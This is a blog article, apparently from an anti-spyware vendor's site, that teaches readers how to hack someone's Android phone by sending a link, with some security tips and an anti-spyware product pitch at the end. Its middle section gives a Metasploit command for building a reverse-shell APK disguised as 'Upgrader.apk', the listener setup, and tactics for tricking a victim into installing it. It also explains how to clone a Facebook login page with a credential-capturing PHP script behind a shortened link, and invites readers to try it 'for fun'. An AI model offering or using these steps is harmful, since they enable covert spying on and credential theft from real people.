Sign Up
Home > Spyware Remover > How to Hack Android Phone By Sending A Link

How to Hack Android Phone By Sending A Link

author_icon Cody Walsh time_icon Last updated May 25, 2021 03:38 pm

Smartphones have become an essential device for human beings. Starting from communication and entertainment to social networking and online shopping, everything is available in the palm of our hands. Everyone’s smartphone contains private and sensitive information which is why smartphones are the prime targets of hackers.

Hacking an Android smartphone is easier than an iPhone. Hacking is not as complicated as you think, but you should have the correct knowledge. In fact, you can hack someone’s Android smartphone by simply sending a link. In this article, we will illustrate how to hack phone by sending a link as well as steps you can take to secure your phone from hackers.

hack android phone by sending link

1. What Is Phone Hacking

Phone hacking refers to the process by hackers get unauthorized access to someone’s mobile phone. Phone hacking includes spying on activities done through the phone, recording keystrokes, intercepting calls, messages, emails, and transferring sensitive data to the hacker’s phone.

Different Ways of Phone Hacking

There are various methods hackers employ for hacking someone's phone.

Phishing – Phishing is the method where the hackers send a message to the victim impersonating a popular company. A victim reads the message and takes the action specified. This action performed by the victim gives a backdoor to the hacker to access the phone.

Malware – Malware refers to a harmful software or application that hacks and damages a device. It can get downloaded to your phone through email attachments, file downloading, app installation, and even while surfing websites. Malware gives total access to hackers to get all the data stored.

Spyware – Spyware is a special type of malware that is designed to stay hidden in a phone and spy on all the activities of the user. It can transfer the details of the activities to the hackers from where they can extract login credentials and other sensitive information.

Wi-Fi Hacking – Professional hackers can hack vulnerable Wi-Fi hotspots, hence, when you connect your phone to such hotspots, your phone gets hacked. Hackers drop malware or spyware through the Wi-Fi connect and get unauthorized access to your phone.

Through App – Professional hackers can hack apps present in Play Stores and get access to phones which have installed them. Moreover, they can develop their own deceiving apps to trick phone users. Users will think of them as normal apps, but these apps can easily have access permission to hack your gallery, chats, and whatnot.

Sending Link – One of the easiest ways to hack a phone is by sending a link to the user. It is highly useful to hack the phones of people you know. This is because they are likely to click on your link as they know and trust you. We will be illustrating how to hack someone mobile by sending link in a later section.

2. What Are The Different Types of Hackers

There are basically three types of hackers present in the world.

hacker types

1. White Hat Hackers – These are security experts that companies hire to help them in finding out any security vulnerability in their software or system. The basic job of a white hat hacker is to hack the software of the company through different backdoors present.

They report the company so that they can patch the vulnerabilities in an update before others can exploit them. Moreover, they can also be hired to investigate any hacking attempted case.

2. Black Hat Hackers – These are culprits who use their hacking skills for hacking into software, systems, and devices illegally. Their main aim is their financial gain by stealing money from bank accounts, credit and debit cards, and even online wallets.

Sometimes, they also blackmail victims with their private chats, photos, videos to extort money. The bigger groups of black hat hackers hack software and system to defame companies and cause nuisances.

3. Grey Hat Hackers – These can be good or bad guys depending on what they do with their hacking knowledge. They can use their knowledge to find out vulnerabilities in software and applications and report the manufacturers for a reward in return. At the same time, some can exploit the vulnerabilities like black hat hackers.

3. How to Hack Android by Sending Link

Let’s start with the basic principle and followed by the methods.

Basic Principle:

To hack an Android phone, you need to take the following steps.

  • 1. Create a link using an appropriate software. The link will lead the victim to your website or app.
  • 2. Send the link to the victim through a text message. Shorten the URL so that the victim cannot see the actual link.
  • 3. Make the message such that the victim clicks on the link immediately.
  • 4. Once the victims click on the link, you can get the desired information from his phone.

The most technical part of this principle is to create the link with a proper software for it to work. The best way is to use Metasploit Software in Kali Linux. There are various other software available in the market for the same purpose.

Way 1: How to Hack Android Phone by Sending A Link Kali Linux

You should have Kali Linux installed on your computer to begin with the following steps.

Step 1: Get started with Kali Linux

- Open Kali's terminal and build a Trojan.apk file.

- To create the file, you should type "msfpayload android/meterpreter/reverse_tcp LHOST= R > /root/Upgrader.apk" on the terminal.

- Replace LHOST IP address with your computer's IP address.

- Open Metasploit Console by typing "msfconsole" on the terminal.

Step 2: Build A Listener

- Once Metasploit Console is done loading, type "use exploit/multi/handler" for multi-handle exploit.

- Then type "set payload android/meterpreter/reverse_tcp"

- Then type "set LHOST YIPA". While typing, replace YIPA with your IP address.

Step 3: Begin Exploiting

- Start the listener you created by typing “exploit”.

- Move the application “Upgrader.apk” you created to your Android phone.

- Send the app to your victim and wait for him to install it.

- Once he installs, the meterpreter prompt will get started through which you can get access to data in his phone.

backdoor using kali

Instead of sending the apk file directly, you can send a link that opens your website. The website should have texts and graphics to make the victim convince to install the apk file. Use plain HTML to create the website and you can find such code online.

Way 2: Create Fake Login Page

In this method, we will be using Phishing technique whereby we will impersonate the login page of a popular website. Here are the steps to follow.

Step 1: Select a popular website like Facebook that you want to impersonate.

Step 2: Go to the login page of the website such as

Step 3: Get the HTML code of the website by right-clicking on the body and then clicking View Page Source option from the menu.

Step 4: Select all the code shown and paste it into a Notepad text file. Save the file as index.html.

Step 5: Now, you need to create a PHP so that when the victim enters username and password through your fake login page, it comes to you. You can find the required code for the PHP file online. Save the PHP file as post.php and make the necessary modifications to sync it with your index.html file.

phishing code

Step 6:Choose a free hosting service and upload the index.html and post.php.

Step 7:Get a domain name and use a URL shortener to hide the domain name.

Step 8:Send the shortened link to the target person and wait for him to open it.

Step 9:You will get device access as well as credentials.

4. How to Secure Android Phone from Hackers

Now that you know how to hack other phone by sending a link, it is time to learn how can you secure your Android phone from hackers.

secure your phone

Simple Steps For Phone Security

Any casual phone user can block most of the hacking attacks by taking certain simple phone security steps.

Don't leave your phone alone – When you are in a public place, never leave your phone unattended. Always keep it in your bag or pocket so that no one can get access to it by any chance.

Change default password – All phones come with a simple and predictable password for user convenience. As soon as you unbox your phone, change all the default passwords. Moreover, use complex password so that no one can guess it or memorize while you are typing it in front of others.

Be Careful About Bluetooth Security – Never connect your phone to an unsecured Bluetooth network. Use popular apps to transfer files. Never keep your Bluetooth on when not used.

Safeguard Your Account Credentials – Never save PIN, password, bank account or credit card details in any file and store it in your phone. It is also not safe to store them in any app because their database can get hacked. If you are saving them anywhere, write them in reverse or complex way so that no one can decode.

Avoid Public WiFi – Public Wi-Fi connections are unsecured and easy targets of hackers. Therefore, try not to connect to them and never type any sensitive information when you are connected to any public Wi-Fi.

Turn off autocomplete option – Autocomplete feature is available in web browsers where they store your login credentials so that it fills automatically and you do not have to type them next time. However, such stored data can be hacked, and you should turn off the feature immediately.

Moreover, you should delete the browsing cookies and cache so that hackers do not get hold of any stored information.

Advanced Way to Prevent Phone Hacking

In today's world, the simple steps for phone security are never enough. You need to do through scanning and get real-time protection.

Using ClevGuard Anti-Spyware: ClevGuard Anti-Spyware is a trusted and feature-rich app for complete protection against phone hacking. It comes with spyware and malicious files scanner, access permission revoking option, real-time protection, and online surfing supervising option.

You should run the scanner regularly to detect any spyware app or malicious file present. Similarly, you should turn on the real-time protection so that it can detect anything malicious instantly and notify you to take actions. Moreover, you can check the access permissions of apps and decide which apps to delete as they are accessing sensitive information without any reason.


Hopefully, you have learnt how to be a mobile phone hacker. You can try it out for fun and not for harm. Besides, you should take the security steps to make sure you do not become the next victim. We recommend you install ClevGuard Anti-Spyware for complete protection and peace of mind.

    You may also be interested in:


By Cody Walsh

Posted on May 25, 2021 ( Updated: May 25, 2021 )

An experienced technology blogger and editor who has spent more than a decade writing about software, gadgets, and computing etc all over the Internet.

Generally rated 4.9 ( participated)


Rated Successfully!


You have already rated this article!